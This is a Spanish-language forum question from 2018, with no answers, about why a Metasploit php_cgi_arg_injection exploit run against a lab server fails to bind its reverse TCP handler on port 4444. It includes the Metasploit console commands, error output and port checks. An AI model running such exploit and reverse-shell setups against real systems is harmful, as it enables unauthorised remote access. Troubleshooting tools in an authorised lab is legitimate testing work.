php_cgi_arg_injection no se puede enlazar en 0.0.0.0 cuando se ejecuta multi / handler

2

Tengo una configuración de servidor en un laboratorio remoto que estoy intentando probar con php_cgi_arg_injection. El exploit funciona, pero no se crea ninguna sesión.

El enrutador de la red local está configurado para reenviar 4444 a <Local IP> . Estoy usando Kali Linux en mi máquina local.

Consola 1:

use exploit/multi/handler
set LHOST <Local IP>

Consola 2:

use exploit/multi/http/php_cgi_arg_injection
set LHOST <External IP>
set RHOST <Target IP>

Salida 1:

[*] Started reverse TCP handler on <Local IP>:4444 

Salida 2:

[-] Handler failed to bind to <Local IP>:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.

No puedo descubrir por qué no se puede enlazar en 0.0.0.0.

Salida de sudo lsof -i -P -n | grep LISTEN

ruby     2227 root    9u  IPv4  38502      0t0  TCP <Local IP>:4444 (LISTEN)

Salida de nmap <External IP>

PORT     STATE SERVICE
4444/tcp open  krb524

enlace informa que mi 4444 externo está abierto, y el usuario responde con una sesión abierta que muere de inmediato. (Comportamiento esperado)

    
pregunta NictraSavios 14.02.2018 - 00:34
fuente

0 respuestas

Lea otras preguntas en las etiquetas